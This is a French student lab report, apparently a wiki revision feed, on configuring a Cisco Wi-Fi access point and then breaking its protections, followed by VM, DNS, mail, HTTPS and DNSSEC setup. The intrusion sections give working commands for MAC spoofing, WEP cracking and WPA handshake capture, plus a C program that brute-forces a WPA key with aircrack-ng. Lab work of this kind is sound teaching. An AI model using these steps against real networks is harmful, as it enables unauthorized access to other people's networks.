&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commence par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenue, on crée un dictionnaire pour le bruteforce sur notre clé wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
Le bruteforce prend une heure pour tester toutes les possibilités avant de trouver la clé wpa&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
Dans un premier temps, on se connecte en root sur la machine cordouan&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, quelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l’accès root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir que : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/[nom de la machine].cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console [nom de la machine]&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Configuration du DNS &amp;lt;/h3&amp;gt;&lt;br /&gt;
Dans cette partie, on n'utilisera plus le serveur DNS de gandi mais le notre installé sur nos machines virtuelles.&lt;br /&gt;
Pour cela il est nécessaire de modifier ces fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
named.conf.local :&lt;br /&gt;
zone &amp;quot;loveandpeace.lol&amp;quot; {&lt;br /&gt;
        type master; // notre DNS est maitre et celui de gandi comme esclave&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dragon&amp;quot;;  //dans ce fichier la, on met toutes notre configuration du DNS&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
db.dragon :&lt;br /&gt;
;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    3600&lt;br /&gt;
@       IN      SOA     ns admin (&lt;br /&gt;
                              3         ; Serial  // ce numero doit être incrémenté après lors de chaque modification&lt;br /&gt;
                           3600         ; Refresh &lt;br /&gt;
                            600         ; Retry&lt;br /&gt;
                          36000         ; Expire&lt;br /&gt;
                           3600 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns&lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
@       IN      MX      100 mail&lt;br /&gt;
&lt;br /&gt;
ns      IN      A       193.48.57.180 //adresse de ma machine virtuel&lt;br /&gt;
mail    IN      A       193.48.57.180&lt;br /&gt;
www     IN      CNAME   ns&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
named.conf.options :&lt;br /&gt;
options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
après la configuration du DNS, on passe à la configuration du mail, ce dernier nous aidera ensuite à la réception du certificat https de gandi.&lt;br /&gt;
Pour cela&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix // on installe postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root // on ajoute un utilisateur qui recevra les mail adressé à admin@loveandpeace.lol&lt;br /&gt;
 apt-get install mailx // on installe mailx&lt;br /&gt;
 apt-get install bsd-mailx // on installe bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx // on vérifie notre boite mail&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation du site en https&amp;lt;/h3&amp;gt;&lt;br /&gt;
Pour la sécurisation du site, il faut créer le fichier suivant : /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost 193.48.57.180:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.loveandpeace.lol&lt;br /&gt;
        ServerAlias loveandpeace.lol&lt;br /&gt;
        DocumentRoot /var/www/www.loveandpeace.lol/  //ici, on met la racine de notre site en mode https&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        // on définit le chemin des certificats obtenus chez gandi&lt;br /&gt;
        SSLCertificateFile /root/dragon.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/dragon.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en considération ces modifications, il faut exécuter les commandes suivantes :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// on prends en compte les modifications&lt;br /&gt;
a2ensite 000-domain.tld-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
//on redemarre le serveur apache&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation du serveur par DNSSEC&amp;lt;/h3&amp;gt;mettant &lt;br /&gt;
En premier, on modifie le fichier /etc/bind/named.conf.options en mettant dnssec-enable =&amp;gt; yes&lt;br /&gt;
Ensuite, on cree le dossier /etc/bind/loveandpeace pour y stocker les clés&lt;br /&gt;
Après, on execute les commandes suivantes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom loveandpeace.lol &lt;br /&gt;
// on renomme ensuite les fichiers générés&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom loveandpeace.lol&lt;br /&gt;
// on renomme ensuite les fichiers générés&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la géneration des clès on doit les prendre en compte dans le fichier db.dragon en incrémentant le &amp;quot;Serial&amp;quot; par 1&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrement grâce à la commande suivante :&lt;br /&gt;
dnssec-signzone -o loveandpeace.lol -k loveandandpaece-ksk ../db.dragon loveandpeace-zsk&lt;br /&gt;
ensuite dans le fichier named.conf.local, on modifie  &amp;quot;/etc/bind/db.dragon&amp;quot;; par &amp;quot;/etc/bind/db.dragon.signed&amp;quot;;&lt;br /&gt;
Au final, on communique la clef publique KSK à gandi.net&lt;br /&gt;
Pour les tests  on utilise le sevise suivant : http://dnsviz.net&lt;/div&gt;</summary>
		<author><name>Machkra</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23370</id>
		<title>TP sysres IMA2a5 2015/2016 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G4&amp;diff=23370"/>
				<updated>2015-11-27T09:55:44Z</updated>
		
		<summary type="html">&lt;p&gt;Machkra : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt;Système &amp;amp; Réseaux : S9 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h2&amp;gt;I - Configuration du point d’accès&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Filtrage par adresse MAC &amp;lt;/h4&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, chaque élève a son propre PC avec une adresse mac unique.&lt;br /&gt;
Ci dessous l'adresse Mac de chaque PC &lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;RElax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:c4&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;papi&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:2d:fb&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour la récupération de l'adresse mac, il suffit d’exécuter la commande suivante : &lt;br /&gt;
/sbin/ifconfig&lt;br /&gt;
&lt;br /&gt;
Le résultat ressemble au suivant :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
eth0      Link encap:Ethernet  HWaddr f0:de:f1:07:29:e3  &lt;br /&gt;
          UP BROADCAST MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)&lt;br /&gt;
          Interrupt:20 Memory:f2500000-f2520000 &lt;br /&gt;
&lt;br /&gt;
lo        Link encap:Local Loopback  &lt;br /&gt;
          inet addr:127.0.0.1  Mask:255.0.0.0&lt;br /&gt;
          inet6 addr: ::1/128 Scope:Host&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:207001 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:207001 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:0 &lt;br /&gt;
          RX bytes:19842913 (19.8 MB)  TX bytes:19842913 (19.8 MB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:27:10:44:fd:40  &lt;br /&gt;
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:227:10ff:fe44:fd40/64 Scope:Global&lt;br /&gt;
          inet6 addr: 2a01:e35:8a07:de10:902f:3b4d:9e94:400c/64 Scope:Global&lt;br /&gt;
          inet6 addr: fe80::227:10ff:fe44:fd40/64 Scope:Link&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12617493 errors:0 dropped:3 overruns:0 frame:0&lt;br /&gt;
          TX packets:4311500 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:17440919166 (17.4 GB)  TX bytes:545660742 (545.6 MB)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;1) Configuration du point d’accès Cisco &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans un premier temps, il nous faut programmer le point cisco par le biais d'une connexion série.&lt;br /&gt;
Après avoir branché le point d’accès en mode série, on se met en mode root et on lance le programme Minicom&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth05:~$ su&lt;br /&gt;
pifou@zabeth05:~$ minicom&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
une fois l’accès au point wifi est réalisé, on accède à sa configuration global : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on configure notre point d’accès afin qu'il autorise l’accès a certaine adresse mac et bloque le reste :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;              &lt;br /&gt;
ap(config)#access-list 701 permit  00:15.afe6.edb3  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edc4  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.2dfb  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Les adresse mac autorisé sont : 00;15:af:e6:ed:b3 et 00:15:af:e6:ed:c4 et 00:15:af:e7:2d:fb&lt;br /&gt;
Une fois l’accès par adresse Mac est configuré, on passe ensuite par la configuration du SSID&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T1&lt;br /&gt;
ap(config-ssid)#dot11 ssid T1 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ceci nous permet de definir le nom du Wifi qui est : T1.&lt;br /&gt;
Ensuite on déclare notre wifi sur l'une des interfaceRadio du point d’accès : on choisit l'interface &amp;quot;dot11Radio0&amp;quot;.&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid T1&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 ????????? transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Le réseau est crypté par une clé wep, et se lance une fois le point d’accès est allumé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;3) Configuration des eeePC &amp;lt;/h4&amp;gt;&lt;br /&gt;
Chaque PC doit se connecter automatiquement une fois allumé, pour cela il faut modifier le fichier : /etc/network/interfaces et y mettre les informations suivants :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key ??????????&lt;br /&gt;
	address 172.26.79.66&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte ces modification il faut redémarrer la carte wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifdow wlan0&lt;br /&gt;
ifup wlan0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Intrusion par Adresse Mac &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on cassera la sécurité Wifi, pour cela il faut juste changer l’adresse Mac de notre PC :&lt;br /&gt;
Pour cela, on utilise les lignes de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifconfig wlan0 down&lt;br /&gt;
ifconfig wlan0 hw ether 00:15:af:e7:2d:fb  (PC d' Eric)&lt;br /&gt;
ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt; Crackage de la cle wep &amp;lt;/h4&amp;gt;&lt;br /&gt;
Dans cette partie, on s'interessera au crackage de la cle wep, pour cela on utilise le packetage aircrack.&lt;br /&gt;
Dans un premier temps :&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
airmondump-ng mon0&lt;br /&gt;
airmondump-ng mon0 --channel 5 --write capteur --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
aircrack-ng capture-01.cap&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h4&amp;gt;Crackage de la cle wpa&amp;lt;/h4&amp;gt;&lt;br /&gt;
la particularité de ce crackage est le fait de trouver le handshak :&lt;br /&gt;
Pour cela on commence par la ligne de commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng -w out --encrypt wpa -c 11 --bssid 04:d4:d2;9c:50:54 mon0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois le handshak est obtenue, on crée un dictionnaire pour le bruteforce sur notre clé wpa, pour cela on cree un petit programme en C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
int cpt = 0;&lt;br /&gt;
for(cpt=0;cpt&amp;lt;99999999;cpt++){&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,cpt);&lt;br /&gt;
}&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On execute le programme en redirigeant sa sortie vers le fichier dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./bruteforce &amp;gt; dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
une fois le dictionnaire est créer, on utilise aircrack-ng ainsi que notre fichier capture(avec le handshak)&lt;br /&gt;
Le bruteforce prend une heure pour tester toutes les possibilités avant de trouver la clé wpa&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [00:58:47] 12399908 keys tested (3597.80 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399905 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 10 F5 F9 6D F5 5D 9A D7 66 CE 4D 59 A7 28 E8 FC &lt;br /&gt;
                       AF FD 13 C5 BF 80 CC AB 1E 72 7F 8F 07 36 3E E5 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : FD 23 BE EE 18 CA 1E 70 D5 E8 2A 44 0A B7 08 7C &lt;br /&gt;
                       CD BA E5 A4 5A 34 EE 2F B4 13 2A 20 81 A7 7A 1B &lt;br /&gt;
                       3E 5A E1 14 D6 4D B9 0B FA 71 D1 C7 FF 01 FE F9 &lt;br /&gt;
                       3A 24 2A F3 91 6F C5 AA 5A 93 6D 64 F9 BC 59 68 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : DE 44 15 8A 67 04 2C FD 62 79 93 1F 08 7B 34 D6 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Partie II - Installation de ma machine virtuel &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, on s'occupera de la création de la machine virtuel :&lt;br /&gt;
Dans un premier temps, on se connecte en root sur la machine cordouan&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net // pour se connecter au serveur hébergeant nos machines virtuels &lt;br /&gt;
xen-create-image --hostname dragon --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Après l'installation de la machine virtuel, quelques changements sont obligatoires :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// autoriser l’accès root  &lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
&lt;br /&gt;
// dessinstaller les packets network-manager systemd&lt;br /&gt;
apt-get purge network-manager systemd&lt;br /&gt;
&lt;br /&gt;
// pour passer via le lien ssh au lieu du lien série&lt;br /&gt;
init tab ==&amp;gt; sur la ligne 45 on change le tty1 par hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après la configuration de notre machine virtuel, il faudra retenir que : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvirir la machine pour la première fois ou après l'avoir éteinte  : xl create /etc/xen/[nom de la machine].cfg&lt;br /&gt;
Pour l'ouverture d'une machine virtuel on utilise la commande: xl console [nom de la machine]&lt;br /&gt;
Pour eteindre la machine on utilise la comande : halt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; installer le mail server &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 vi /etc/aliases =&amp;gt; ajout de : admin:         root&lt;br /&gt;
 apt-get install mailx&lt;br /&gt;
 apt-get install bsd-mailx&lt;br /&gt;
 newaliases // recompiler les alias&lt;br /&gt;
 mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost 193.48.57.180:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.loveandpeace.lol&lt;br /&gt;
        ServerAlias loveandpeace.lol&lt;br /&gt;
        DocumentRoot /var/www/www.loveandpeace.lol/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/dragon.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/dragon.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  155  cat /root/mbox &lt;br /&gt;
  156  nano /root/mbox &lt;br /&gt;
  157  nano dragon.crt&lt;br /&gt;
  158  ls&lt;br /&gt;
  159  nano gandi.cert&lt;br /&gt;
  160  mv dragon.crt dragon.cert&lt;br /&gt;
  161  ls&lt;br /&gt;
  162  ls&lt;br /&gt;
  163  vi /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  164  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  165  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  166  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
  167  nano /etc/apache2/sites-available/000-default.conf &lt;br /&gt;
  168  nano /etc/apache2/sites-available/000-domain.tld-ssl&lt;br /&gt;
